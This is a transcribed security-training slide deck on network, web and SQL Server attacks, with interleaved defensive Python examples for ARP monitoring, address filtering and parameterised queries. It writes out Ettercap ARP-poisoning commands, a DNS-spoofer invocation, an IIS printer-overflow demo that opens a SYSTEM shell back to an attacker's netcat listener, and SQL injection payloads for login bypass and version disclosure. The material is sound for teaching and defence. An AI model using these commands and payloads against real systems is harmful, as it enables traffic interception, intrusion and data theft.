Network Security and Hacking Techniques Day-3

Upload: jai4uk

Post on 07-May-2015


Page 1: Day3 Backup

Network Security

and Hacking Techniques

Day-3

Page 2: Day3 Backup

Network Security and Hacking Techniques – DAY-3

Typical Network Hacking Techniques

“The Linux Based Services that Mean Business Securing Internet”

Figure: a typical target network with its visible IP address, an internal network of PC servers (Linux and Windows), host/application servers and monitoring systems such as IDSs and sniffers, captioned “I want these systems”.

Page 3: Day3 Backup

Network-Level Attacks

ARP Refresher

Sniffing Attacks

Sniffing Detection

Ettercap Example

DNS Cache Poisoning

Denial of Service Attacks

Page 4: Day3 Backup

ARP Refresher

ARP Message Formats

ARP packets provide the mapping between hardware-layer and protocol-layer addresses

28-byte header for an IPv4 Ethernet network:

8 bytes of ARP data

20 bytes of Ethernet/IP address data

6 ARP messages:

ARP request and reply

ARP reverse request and reply

ARP inverse request and reply

Page 5: Day3 Backup

Gathering and Parsing Packets (Cont..)

IP Address Spoofing Variations

Page 6: Day3 Backup

ARP Request Message

Source contains initiating system’s MAC address and IP address

Destination contains the broadcast MAC address ff:ff:ff:ff:ff:ff

Page 7: Day3 Backup

ARP Reply Message

Source contains replying system’s MAC address and IP address

Destination contains requestor’s MAC address and IP address

Page 8: Day3 Backup

Unsolicited ARP Reply

Any system can spoof a reply to an ARP request

Receiving system will cache the reply

Overwrites existing entry

Adds entry if one does not exist

Usually called ARP poisoning

Page 9: Day3 Backup

Types of Attack

Sniffing Attacks

Session Hijacking/MiM

Page 10: Day3 Backup

Sniffing on a Hub

Figure: sniffer, source and destination hosts all attached to one hub; the hub repeats every frame to every port, so the sniffer sees the source-to-destination traffic.

Page 11: Day3 Backup

Host to Host Exploit

Figure: Client (C), Server (S) and a Hostile host on one segment. C sends a broadcast ARP request and S sends the real ARP reply; the hostile host then sends a spoofed ARP reply to C and a spoofed ARP reply to S, so each end caches the hostile host's MAC for the other.

Page 12: Day3 Backup

Host to Router Exploit

Figure: Client (C), Gateway Router (R) and a Hostile host on one segment. C sends a broadcast ARP request and R sends the real ARP reply; the hostile host then sends a spoofed ARP reply to C and a spoofed ARP reply to R, so the client and the gateway each cache the hostile host's MAC for the other.

Page 13: Day3 Backup

Relay Configuration

Figure (ARP tables after poisoning): M-1 is 0:c:3b:9:4d:8 - 10.1.1.7 and M-3 is 0:c:3b:1c:2f:1b - 10.1.1.2; the poisoned entries 0:c:3b:1a:7c:ef - 10.1.1.7 and 0:c:3b:1a:7c:ef - 10.1.1.2 both point at the attacker, 0:c:3b:1a:7c:ef - 10.1.1.10.

Page 14: Day3 Backup

Relay Configuration (cont.)

Figure: sniffer, source and destination hosts attached to a switch (the relay configuration of the previous slide).

Page 15: Day3 Backup

Detection

OS Level Detection

Operating System     OS Level Detection
Windows 95           NO
Windows 98           NO
Windows NT           NO
Windows 2000         NO
Linux RedHat 7.0     NO
FreeBSD 4.2          YES

Page 16: Day3 Backup

Hypothetical Detection Application

Purpose

Track and maintain ARP/IP pairings

Identify non-standard ARP-replies versus acceptable ones

• Timeout issues

OS must withstand corruption itself

Fix broken ARP entries of systems

• Transmission of correct ARP replies
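The monitor this slide sketches can be built directly on the 28-byte ARP layout from the refresher (8 bytes of ARP data, then 20 bytes of Ethernet/IP addresses). The Python below is an added example, not code from the slides or from any of the tools they name: it packs and parses IPv4-over-Ethernet ARP packets with struct, keeps an IP-to-MAC table the way arpwatch does, and flags two of the "non-standard" replies the slide wants identified, a reply nobody requested and a reply that rewrites a pairing already on record. The three frames it replays are constructed from the addresses used on the relay slides (10.1.1.2, 10.1.1.7 and the attacker's 0:c:3b:1a:7c:ef); nothing is sent on the wire.

```python
import struct
from typing import Dict, List, Set

ARP_REQUEST = 1
ARP_REPLY = 2
# 8 bytes of ARP data (htype, ptype, hlen, plen, op) followed by 20 bytes of
# Ethernet/IP addresses (sha, spa, tha, tpa): the 28-byte IPv4-over-Ethernet layout.
ARP_FMT = "!HHBBH6s4s6s4s"
ARP_LEN = struct.calcsize(ARP_FMT)  # 28


def mac_bytes(mac: str) -> bytes:
    # accepts both "0:c:3b:9:4d:8" (as written on the slides) and zero-padded forms
    return bytes(int(part, 16) for part in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(part) for part in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(op: int, sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Build one 28-byte ARP packet (hardware type 1 = Ethernet, protocol 0x0800 = IPv4)."""
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, op,
                       mac_bytes(sha), ip_bytes(spa), mac_bytes(tha), ip_bytes(tpa))


def parse_arp(pkt: bytes) -> Dict[str, object]:
    """Parse a packet back into fields, rejecting anything that is not IPv4-over-Ethernet ARP."""
    if len(pkt) < ARP_LEN:
        raise ValueError("short ARP packet")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, pkt[:ARP_LEN])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not IPv4-over-Ethernet ARP")
    return {"op": op, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


class ArpMonitor:
    """Arpwatch-style tracker: remembers IP->MAC pairings, flags replies that were never
    requested and replies that rewrite a pairing already on record."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}     # IP -> MAC as last seen
        self.pending: Set[str] = set()      # IPs with an outstanding request
        self.alerts: List[str] = []

    def observe(self, pkt: bytes) -> List[str]:
        a = parse_arp(pkt)
        new_alerts: List[str] = []
        if a["op"] == ARP_REQUEST:
            self.pending.add(a["tpa"])
        elif a["op"] == ARP_REPLY:
            if a["spa"] not in self.pending:
                new_alerts.append(f"unsolicited reply: {a['spa']} is-at {a['sha']}")
            self.pending.discard(a["spa"])
        # requests and replies both announce the sender's own pairing
        old = self.table.get(a["spa"])
        if old is not None and old != a["sha"]:
            new_alerts.append(f"changed pairing: {a['spa']} was {old}, now {a['sha']}")
        self.table[a["spa"]] = a["sha"]
        self.alerts.extend(new_alerts)
        return new_alerts


def replay_poisoning() -> List[str]:
    """Constructed three-frame sequence on the deck's addresses: a legitimate request/reply
    between 10.1.1.2 and 10.1.1.7, then a forged reply moving 10.1.1.7 to the attacker's MAC."""
    mon = ArpMonitor()
    frames = [
        build_arp(ARP_REQUEST, "0:c:3b:1c:2f:1b", "10.1.1.2", "0:0:0:0:0:0", "10.1.1.7"),
        build_arp(ARP_REPLY, "0:c:3b:9:4d:8", "10.1.1.7", "0:c:3b:1c:2f:1b", "10.1.1.2"),
        build_arp(ARP_REPLY, "0:c:3b:1a:7c:ef", "10.1.1.7", "0:c:3b:1c:2f:1b", "10.1.1.2"),
    ]
    for frame in frames:
        mon.observe(frame)
    return mon.alerts


if __name__ == "__main__":
    for line in replay_poisoning():
        print(line)
```

Two caveats the slide already hints at: a legitimate gratuitous ARP is also unsolicited, and a DHCP lease moving to a new host is a genuine pairing change, so alerts need an allow-list, and the request table needs the timeout the slide mentions. As written, a request stays pending until a reply arrives, so a stale request would make a later forged reply look solicited; expiring pending entries after a few seconds closes that gap.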

Page 17: Day3 Backup

Tools and Utilities

Manipulation

Dsniff 2.3

Hunt 1.5

Growing number of others

Local monitoring

Arpwatch 1.11

Page 18: Day3 Backup

Tools - ARP Spoofing

Windows

Ettercap

Unix

Dsniff

Hunt

Page 19: Day3 Backup

Ettercap

To start: C:\ettercap -i dev1

• Try dev0, dev1, dev2, etc., until it finds your Ethernet adapter

• It takes a long time to scan the network

Page 20: Day3 Backup

Ettercap Sniffing Options

Usage: ettercap [OPTION] [HOST:PORT] [HOST:PORT] [MAC] [MAC]

Sniffing method:

-a, --arpsniff ARPBASED sniffing (specifying two hosts)

SMARTARP (specifying one host but with the list

PUBLICARP (specifying only one host silently)

in silent mode : must specify both IP and MAC

i.e.: ettercap -Nza IP IP MAC MAC (ARPBASED)

ettercap -Na IP MAC (SMARTARP)

ettercap -Nza IP MAC (PUBLICARP)

-s, --sniff IPBASED sniffing

you can specify the ANY ip that means ALL hosts

e.g.: ettercap -Nzs ANY:80 (sniff only http)

-m, --macsniff MACBASED sniffing

e.g.: ettercap -zm MAC1 MAC2

ettercap -Nm MAC

Off Line Sniffing:

-T, --readpcapfile OFFLINE sniffing (read packets from a file)

e.g.: ettercap -T file_dumped_from_tcpdump

-Y, --writepcapfile DUMP packets to a pcap compatible file format

e.g.: ettercap -NzsY file_to_be_dumped

Page 21: Day3 Backup

Spoofing example with Ettercap

Telling HOST 1 that 10.1.1.7 is at 0:c:3b:1a:7c:ef

Telling HOST 2 that 10.1.1.2 is at 0:c:3b:1a:7c:ef

(C:\ettercap -a 10.1.1.2 10.1.1.7 0:c:3b:1c:2f:1b 0:c:3b:9:4d:8)

Now they are poisoned: they will send their packets to us. If we then receive packets from:

HOST 1 we will forward to 0:c:3b:9:4d:8

HOST 2 we will forward to 0:c:3b:1c:2f:1b

Figure (the ARP tables of the Relay Configuration slide): M-1 is 0:c:3b:9:4d:8 - 10.1.1.7 and M-3 is 0:c:3b:1c:2f:1b - 10.1.1.2; the poisoned entries 0:c:3b:1a:7c:ef - 10.1.1.7 and 0:c:3b:1a:7c:ef - 10.1.1.2 both point at the attacker, 0:c:3b:1a:7c:ef - 10.1.1.10.

Page 22: Day3 Backup

Bibliography

Finlayson, Mann, Mogul, Theimer, RFC 903 “A Reverse Address Resolution Protocol,” June 1984

Kra, Hunt 1.5, http://www.gncz.cz/kra/index.html, Copyright 2000

Lawrence Berkeley National Laboratory, Network Research Group, Arpwatch 1.11, ftp://ftp.ee.lbl.gov/arpwatch.tar.Z, Copyright 1996

Plummer, David C., RFC 826 “An Ethernet Address Resolution Protocol,” November 1982

Russell, Ryan and Cunningham, Stace, “Hack Proofing Your Network,” Syngress Publishing Inc., Copyright 2000

Song, Dug, Dsniff 2.3, http://www.monkey.org/~dugsong/, Copyright 2000

Page 23: Day3 Backup

Network-Level Attacks (Cont…)

Packet Sniffing:

A packet sniffer is a piece of software that grabs all of the traffic flowing

Dsniff -n -i 1

Page 24: Day3 Backup

DNS Cache Poisoning

DNS Cache Poisoning

DNS ID Spoofing

DNS Hides Poisoning

Page 25: Day3 Backup

DNS Cache Poisoning - TOOL

http://www.securiteinfo.com/download/wds.zip

This tool is a simple DNS ID Spoofer for Windows 9x/2K

the MAC address of the DNS server (or the default gateway if the DNS server is in another network).

Usage: wds -h

Example: wds -n www.microsoft.com -i 216.239.39.101 -g 00-00-39-5c-45-3b

Page 26: Day3 Backup

Gathering and Parsing Packets (Cont..)

The ARP Cache poisoning:

Page 27: Day3 Backup

Denial of Service Attacks

Page 28: Day3 Backup

Denial of Service Attacks

DoS attacks are as old as the Internet itself

In the year 2000 a completely new class of DoS attack appeared: the distributed DoS (DDoS).

DDoS attacks struck a large number of prominent web sites, including Yahoo, eBay, Amazon and Buy.com

DDoS Concepts:

Distributing the attack across several hosts

Coordinating the attack among many machines

Using the distribution system to thwart all attempts to discover the origin of the attack

Page 29: Day3 Backup

Denial of Service Attacks

TCP Connections

Page 30: Day3 Backup

Denial of Service Attacks (Cont…)

Abusing TCP: The Traditional SYN Flood

Page 31: Day3 Backup

“Smurf”

Figure: the perpetrator sends ICMP echo requests, carrying the spoofed source address of the victim, across the Internet to an IP broadcast address; every host on that broadcast network answers with an ICMP echo reply sent to the victim.

Page 32: Day3 Backup

Denial of Service Attacks (Cont…)

The Development of Bandwidth Attacks

Page 33: Day3 Backup

Denial of Service Attacks (Cont…)

DOS

Page 34: Day3 Backup

Denial of Service Attacks (Cont…)

DDOS

Page 35: Day3 Backup

Denial of Service Attacks (Cont…)

Distributed Reflection DOS

Page 36: Day3 Backup

Denial of Service Attacks (Cont…)

Packet path diffusion

Page 37: Day3 Backup

Denial of Service Attacks (Cont…)

Diffusing the path

Page 38: Day3 Backup

Prevention Techniques

Ingress Filtering

Deployed by ISPs to drop packets with source IP addresses outside the range of a customer’s network, so that attackers cannot use forged source addresses to launch a DoS attack.

Egress Filtering

Prevents one’s network from being the source of forged communications used in DoS attacks.
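As an added illustration of these two bullets (not from the slides), the Python below applies the same source-address test at the three places it belongs: ingress at the ISP edge on a customer link, egress at the customer's own border, and, going one step beyond the slide, inbound from the Internet, where RFC 1918 and other "martian" sources and packets claiming our own prefix are dropped. Addresses are constructed from the documentation ranges 203.0.113.0/24, 198.51.100.0/24 and 192.0.2.0/24; a packet is just a (source, destination) pair.

```python
import ipaddress
from typing import Callable, List, Sequence, Tuple

Packet = Tuple[str, str]  # (source IP, destination IP); the filter looks only at the source

# Source ranges that never legitimately arrive from the public Internet: "this network",
# RFC 1918 private space, loopback, link-local, multicast and reserved (224/3).
# This martian list is an extension beyond the slide's two bullets.
MARTIANS = ["0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
            "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3"]


def in_prefixes(ip: str, prefixes: Sequence[str]) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(p) for p in prefixes)


def partition(packets: Sequence[Packet],
              keep: Callable[[Packet], bool]) -> Tuple[List[Packet], List[Packet]]:
    accepted: List[Packet] = []
    dropped: List[Packet] = []
    for pkt in packets:
        (accepted if keep(pkt) else dropped).append(pkt)
    return accepted, dropped


def ingress_filter(customer_prefixes: Sequence[str], packets: Sequence[Packet]):
    """ISP edge, on the link from one customer (RFC 2827 / BCP 38): forward a packet only
    if its source address belongs to a prefix assigned to that customer."""
    return partition(packets, lambda p: in_prefixes(p[0], customer_prefixes))


def egress_filter(own_prefixes: Sequence[str], packets: Sequence[Packet]):
    """Customer border, outbound: a packet may leave only with one of our own source
    addresses, so a compromised host inside cannot emit forged-source flood traffic."""
    return partition(packets, lambda p: in_prefixes(p[0], own_prefixes))


def inbound_border_filter(own_prefixes: Sequence[str], packets: Sequence[Packet]):
    """Customer border, inbound from the Internet: drop martian sources and drop packets
    that claim one of our own addresses (they cannot have come from outside)."""
    return partition(packets, lambda p: not in_prefixes(p[0], MARTIANS)
                     and not in_prefixes(p[0], own_prefixes))


# Constructed sample traffic: our network is 203.0.113.0/24, the flood victim is
# 198.51.100.7 and 192.0.2.0/24 is some unrelated network.
OUR_PREFIXES = ["203.0.113.0/24"]
OUTBOUND: List[Packet] = [
    ("203.0.113.5", "198.51.100.7"),  # genuine
    ("198.51.100.7", "192.0.2.255"),  # forged: victim's address as source, aimed at a broadcast
    ("192.0.2.9", "198.51.100.7"),    # forged: somebody else's address
    ("10.0.0.3", "198.51.100.7"),     # forged: private address
]
INBOUND: List[Packet] = [
    ("192.0.2.9", "203.0.113.5"),     # plausible external source
    ("10.0.0.3", "203.0.113.5"),      # martian: RFC 1918 source arriving from the Internet
    ("203.0.113.9", "203.0.113.5"),   # our own prefix arriving from outside: spoofed
]

if __name__ == "__main__":
    for name, result in [("ingress", ingress_filter(OUR_PREFIXES, OUTBOUND)),
                         ("egress", egress_filter(OUR_PREFIXES, OUTBOUND)),
                         ("inbound", inbound_border_filter(OUR_PREFIXES, INBOUND))]:
        accepted, dropped = result
        print(f"{name}: accepted {accepted}, dropped {dropped}")
```

Ingress and egress filtering use the identical test; what differs is who runs it and which prefix list is the reference, which is why the slide presents them as two techniques. Note that only the ISP's ingress filter protects third parties from a customer that does not bother with egress filtering.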

Page 39: Day3 Backup

Web Application Attacks

Introduction

Hacking Windows 2000: A Sample

SQL Injection: Manipulating Back-end Databases

Cross-Site Scripting

Page 40: Day3 Backup

The Hacking Exposed Philosophy

“The most important step towards securing your network is trying to break into it.”

Page 41: Day3 Backup

Background

Most “script kiddies” will attack the OS and web server service.

They scan for web ports, search for vulnerabilities, and then attack.

The more sophisticated attacker will attack the custom application running on the web server.

Page 42: Day3 Backup

Hacking Step 1: Scanning…

Step 1: Using NMAP or any other port scanner, the attacker finds which ports are open on the target network and what application is running on each of them

Page 43: Day3 Backup

Hacking Step 2: Vulnerability Scanning…

Web vulnerability scanners check for known holes.

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items

#nikto.pl -h 206.135.57.178

-- nikto / v1.4.0 / rain forest puppy / www.wiretrip.net --

- Loaded script database of 1968 lines

= - = - = - = - = - =

= Host: 206.135.57.178

= Server: Apache/1.3.20 (Unix)

- www.apache.org

+ 404 Not Found: GET /cfdocs/

- Directory index: /scripts/

+ Found: GET /scripts/cfcache.map

+ 404 Not Found: GET /cfcache.map

+ 404 Not Found: GET /cfide/Administrator/startstop.html

Page 44: Day3 Backup

Hacking Step 2: Vulnerability Identification

Search Internet for current vulnerabilities

http://www.google.com

http://www.securityfocus.com

http://www.packetstormsecurity.com/

Page 45: Day3 Backup

Vulnerability Identification

www.SecurityFocus.com

Vulnerabilities by vendor

Vulnerabilities by BID

www.securityfocus.com/bid/<bid #>

Page 46: Day3 Backup

Vulnerability Identification

www.packetstormsecurity.com: useful directory on the site

http://packetstormsecurity.com/windows2000/

Page 47: Day3 Backup

Hacking Windows 2000

More recently, the most effective way to compromise a Windows NT/2000 system is via Internet Information Server (IIS)

IIS is installed by default and listens on TCP 80; many don’t realize it’s there (and vulnerable…)

Those who run their Website on IIS can’t just block access to it

Windows 2000 ships with IIS version 5 (IIS5). Microsoft’s flagship Web server has a long history of security flaws. It is debatable whether these flaws are more prevalent in Microsoft code, or whether Microsoft’s code is simply more prevalent

(Yes, we’ll talk about Gartner later…)

Page 48: Day3 Backup

Top Five Windows 2000 IIS Threats

Remote Command Execution Via Internet Printing Service

Microsoft IIS CGI Filename Decode Error Vulnerability

Remote command execution via Buffer Overflow in Indexing Service

Unauthorised SMTP relaying

Buffer Overflow in FrontPage server extension

Page 49: Day3 Backup

Remote Command Execution Via Internet Printing Service

Internet Printing is a new feature in Windows, introduced with the release of Windows 2000 Server.

It provides users with the ability to access a printer across an Intranet or the Internet and submit a job directly to the printer through the browser.

This functionality is enabled by default

The vulnerability exists in an unchecked buffer in the msw3prt.dll, allowing an attacker to post a string of approximately 420 characters that will cause the buffer to overflow and commands to be overwritten with the newly injected shell code.

Page 50: Day3 Backup

IIS Buffer Overflows: IPP

Simple to exploit:

GET /null.printer HTTP/1.0

Host: [> 420 char. buffer]

Page 51: Day3 Backup

IIS Buffer Overflows: IPP

Published exploits:

jill-win32.exe by dark spyrit

Iis5hack.exe by hsj

Remotely exploits buff. overflow, inserts shellcode to “shell” back to a listener on attacker’s system

Evil…

Page 52: Day3 Backup

IIS Buffer Overflows: IPP

Page 53: Day3 Backup

IPP Buffer Overflow DEMO

Start netcat listener on attacker’s system

nc -vv -l -p 23

Execute jill-win32:

jill-win32 victim 80 attacker 23

Shell pops up on attacker’s machine, SYSTEM context

Page 54: Day3 Backup

Practicals

Try to compromise your server

Page 55: Day3 Backup

SQL Scanning

TCP port 1433

SQL Server defaults to listen on these ports since ip-sockets net-lib is installed by default (along with named pipes)

UDP port 1434

Thanks to multiple instancing, having to know the exact port is not needed to connect since the net-libs will be more than happy to auto-connect you to the instance

Page 56: Day3 Backup

SQL Scanning (cont.)

Starting nmapNT V. 2.53 SP1 by [email protected]

eEye Digital Security ( http://www.eEye.com )

based on nmap by [email protected] ( www.insecure.org/nmap/ )

Interesting ports on (10.6.6.205):

(The 1507 ports scanned but not shown below are in state: closed)

Port State Service

21/tcp open ftp

25/tcp open smtp

80/tcp open http

88/tcp open kerberos-sec

135/tcp open loc-srv

139/tcp open netbios-ssn

389/tcp open ldap

443/tcp open https

445/tcp open microsoft-ds

464/tcp open kpasswd5

593/tcp open http-rpc-epmap

636/tcp open ldapssl

1026/tcp open nterm

1080/tcp open socks

1433/tcp open ms-sql-s -------

3389/tcp open msrdp

Page 57: Day3 Backup

SQL Server Discovery

Multiple instancing capabilities of SQL Server 2000 make enumeration a functional requirement

A specially formed UDP packet directed at port 1434 will cause the SQL 2K listener service to divulge information about every instance of SQL Server running on that machine

Packet Information

• Instance names

• Net-libs supported

• TCP ports and pipe names

• Clustering support (juicy targets)

Page 58: Day3 Backup

Broadcast Discovery

Since the listener may exist on multiple machines, it is possible to send a broadcast UDP packet to port 1434 to discover all instances of SQL Server 2000 on a subnet

sql -L (will return a raw listing)

Capture returned packets

Analyze

Page 59: Day3 Backup

SQL Server Discovery

The following is a sample response from a SQL Server to the UDP broadcast:

(Captured using Snort-1.6.3 – http://www.snort.org)

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL Server Reply [**]

12/22-14:18:22.320099 10.6.7.37:1434 -> 10.6.6.194:4412

UDP TTL:128 TOS:0x0 ID:15054

Len: 133

.z.ServerName;DEV-REPORT2;InstanceName;MSSQLSERVER;IsClustered;N

o;Version;8.00.194;tcp;1433;np;\\DEV-REPORT2\pipe\sql\query;;

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
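The reply's first three bytes, shown as ".z." in the capture, are the 0x05 server-response marker and a little-endian 16-bit length (0x7a = 122, exactly the number of characters of text that follow), after which come key;value pairs separated by ";" with ";;" closing each instance. The Python below is an added example, not the slides' code or SQLPing: it re-frames the captured text and the two-instance listing from the next slide, parses them, and produces one inventory row per instance so a defender can check which instances and TCP ports are actually reachable. Values are assumed not to contain ";", which holds for the names, ports and pipe paths seen in the capture.

```python
import struct
from typing import Dict, List

SSRP_SERVER_RESPONSE = 0x05  # first byte of every listener reply


def frame_response(text: str) -> bytes:
    """Frame a reply the way the SQL Server 2000 listener does: 0x05, a little-endian
    16-bit length of the text, then the text itself."""
    raw = text.encode("latin-1")
    return struct.pack("<BH", SSRP_SERVER_RESPONSE, len(raw)) + raw


def parse_response(datagram: bytes) -> List[Dict[str, str]]:
    """Return one dict per instance. Instances are separated by ';;'; within an instance
    the fields alternate key;value. Malformed or truncated input raises ValueError."""
    if len(datagram) < 3 or datagram[0] != SSRP_SERVER_RESPONSE:
        raise ValueError("not an SSRP server response")
    (length,) = struct.unpack_from("<H", datagram, 1)
    if len(datagram) < 3 + length:
        raise ValueError("truncated SSRP response")
    text = datagram[3:3 + length].decode("latin-1")
    instances: List[Dict[str, str]] = []
    for chunk in text.split(";;"):
        if not chunk:
            continue
        fields = chunk.split(";")
        if len(fields) % 2:
            raise ValueError("odd field count in instance record")
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def inventory(datagrams: List[bytes]) -> List[Dict[str, str]]:
    """Flatten the replies into rows a defender can compare against firewall rules."""
    rows: List[Dict[str, str]] = []
    for datagram in datagrams:
        for inst in parse_response(datagram):
            rows.append({
                "server": inst.get("ServerName", ""),
                "instance": inst.get("InstanceName", ""),
                "version": inst.get("Version", ""),
                "tcp": inst.get("tcp", ""),
                "clustered": inst.get("IsClustered", ""),
            })
    return rows


# Reconstructed from the text visible in the Snort capture above (single instance) ...
DEV_REPORT2 = frame_response(
    r"ServerName;DEV-REPORT2;InstanceName;MSSQLSERVER;IsClustered;No;Version;8.00.194;"
    r"tcp;1433;np;\\DEV-REPORT2\pipe\sql\query;;")
# ... and from the two-instance SQLPing listing on the following slide.
LANDROVER = frame_response(
    r"ServerName;LANDROVER;InstanceName;SQL2K;IsClustered;No;Version;8.00.194;tcp;1241;"
    r"np;\\LANDROVER\pipe\MSSQL$SQL2K\sql\query;;"
    r"ServerName;LANDROVER;InstanceName;MSSQLServer;IsClustered;No;Version;7.00.623;"
    r"np;\\LANDROVER\pipe\sql\query;tcp;1433;rpc;LANDROVER;;")

if __name__ == "__main__":
    for row in inventory([DEV_REPORT2, LANDROVER]):
        print(row)
```

The same parser works on replies collected from a real UDP/1434 broadcast, which is how an administrator can find instances that were installed without their knowledge (the slide's point about multiple instancing) and confirm that the listener itself is not reachable from untrusted networks.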

Page 60: Day3 Backup

SQLPing Utility

Directs a custom udp packet at a specific target or subnet and enumerates the server info across multiple instances

Listening....

ServerName:LANDROVER

InstanceName:SQL2K

IsClustered:No

Version:8.00.194

tcp:1241

np:\\LANDROVER\pipe\MSSQL$SQL2K\sql\query

ServerName:LANDROVER

InstanceName:MSSQLServer

IsClustered:No

Version:7.00.623

np:\\LANDROVER\pipe\sql\query

tcp:1433

rpc:LANDROVER

http://www.sqlsecurity.com/utils/sqlping.zip

Page 61: Day3 Backup

SQL Code Injection

The ability of an attacker to inject unintended SQL statements into an application

Consequences

• Exposure of sensitive data

• SQL privilege escalation

• OS access

• COM+ access

Page 62: Day3 Backup

Scope of SQL Injection

SQL injection attacks rarely alert IDS systems, especially over SSL

It is difficult to track down all the areas of exploitation, since the only real solution is manual code review

No amount of OS security, firewalls or patch diligence will stop SQL injection.

The solution is good coding practices

Page 63: Day3 Backup

SQL Injection Sample

ASP Code

<%
Set Conn = Server.CreateObject("ADODB.Connection")
Conn.open "dsn=myapp;uid=sa;pwd=45nf3k332fhj"
Set RS = Conn.Execute("SELECT * from users where username='" & username & "' AND password='" & password & "'")
%>

Page 64: Day3 Backup

SQL Injection Example 1

Normal login

SQL Server sees

• select * from users where username='bob' and password='b2oQeDr!'

• All is well (or so it seems)

Login Page

UserName: bob

Password: b2oQeDr!

Page 65: Day3 Backup

SQL Injection Example 1

Malicious Login

SQL Server sees

• select * from users where username='bob' and password='' union select * from users where admin=1--

• In this case the user logs in as the site administrator

Login Page

UserName: bob

Password: ' union select * from users where admin=1--
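To make the two outcomes concrete, here is an added example (not from the slides or the ASP sample) that runs the same query text through Python's sqlite3: login_concat builds the statement exactly as the ASP code does, login_param sends the values as parameters, and the malicious password from this slide is fed to both. The search-page probe from the next slides is included too, with sqlite_version() standing in for SQL Server's @@version. The users and people rows are constructed sample data.

```python
import sqlite3
from typing import Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample data: bob from the slide plus one administrator row, and a
    people table shaped like the user-search page (last, first, email)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT, admin INTEGER);
        INSERT INTO users VALUES ('bob', 'b2oQeDr!', 0);
        INSERT INTO users VALUES ('siteadmin', 'Adm1n-Secret', 1);
        CREATE TABLE people (last TEXT, first TEXT, email TEXT);
        INSERT INTO people VALUES ('Andrews', 'chip', 'chip@example.invalid');
    """)
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """The ASP sample's construction: user input pasted straight into the SQL text."""
    sql = ("SELECT * FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return conn.execute(sql).fetchall()


def login_param(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """Parameterised form: the values travel separately from the statement, so a quote
    or UNION in the input is compared as data and never parsed as SQL."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


def search_concat(conn: sqlite3.Connection, last_name: str) -> List[Tuple]:
    """The search page's three-column query, built the vulnerable way."""
    sql = "SELECT last, first, email FROM people WHERE last='" + last_name + "'"
    return conn.execute(sql).fetchall()


def search_param(conn: sqlite3.Connection, last_name: str) -> List[Tuple]:
    return conn.execute("SELECT last, first, email FROM people WHERE last=?",
                        (last_name,)).fetchall()


# The two inputs from the slides; sqlite_version() stands in for SQL Server's @@version.
BYPASS_PASSWORD = "' union select * from users where admin=1--"
VERSION_PROBE = "' union select '','',sqlite_version()--"


def demo() -> Dict[str, List[Tuple]]:
    conn = make_db()
    return {
        "normal": login_concat(conn, "bob", "b2oQeDr!"),
        "concat_bypass": login_concat(conn, "bob", BYPASS_PASSWORD),
        "param_bypass": login_param(conn, "bob", BYPASS_PASSWORD),
        "concat_search": search_concat(conn, VERSION_PROBE),
        "param_search": search_param(conn, VERSION_PROBE),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The concatenated login returns the administrator row and the concatenated search returns the database version, while the parameterised versions return nothing for either input. That is the whole difference between the "poor input validation" listed on the Problems slide and the good coding practice the Scope slide calls for; the sa credentials hard-coded in the ASP sample are the other half of the problem, because every injected statement runs with that account's privileges.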

Page 66: Day3 Backup

SQL Injection Example 2

Normal usage

Notice that on a search page we get immediate feedback – good target for injection

Also, since we see three columns we can assume that’s all the SQL statement is selecting

User Search

Enter Last Name: andrews

Results:

Last First email

Andrews, chip [email protected]

Page 67: Day3 Backup

SQL Injection Example 2

Malicious Usage

User Search

Enter Last Name: ' union select '','',@@version

Results:

Last First email

Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 1)

Page 68: Day3 Backup

SQL Injection Samples

Problems

Poor input validation

Secret in ASP code (source code disclosure)

Poorly typed – SQL server and ASP not checking data-types

Security context too high for needed functionality

Page 69: Day3 Backup

Best Practices

Use principle of least-privilege

Assign MSSQLServer service non-administrator user context

Take the time to properly implement trusted security (Integrated Mode)

Don’t place passwords in script

Assign complex ‘sa’ password even when using Integrated security

Consider dropping certain procedures in the interest of security. They can always be added later.

Page 70: Day3 Backup

Operating System and Application-Level Attacks

Password Cracking With L0phtCrack

NetBios/SMB Hacking

Buffer Overflows in Depth

Examples of remote root exploit through buffer overflow

Root Kits

Page 71: Day3 Backup

NetBios/SMB Hacking

Introduction

SMB/NetBios Explained and Exploited

Win2k Architecture

Network and Host Enumeration

Penetration

Pillaging Hosts

Escalation

Summary and Wrap-up

Page 72: Day3 Backup

SMB/NetBios Explained and Exploited

SMB is Server Message Block

A protocol over NetBios or TCP

Used for “net use” type communications

• UDP port 137 (name services)

• UDP port 138 (datagram services)

• TCP port 139 (session services)

NT uses port 139

Win2k uses ports 139 and/or 445

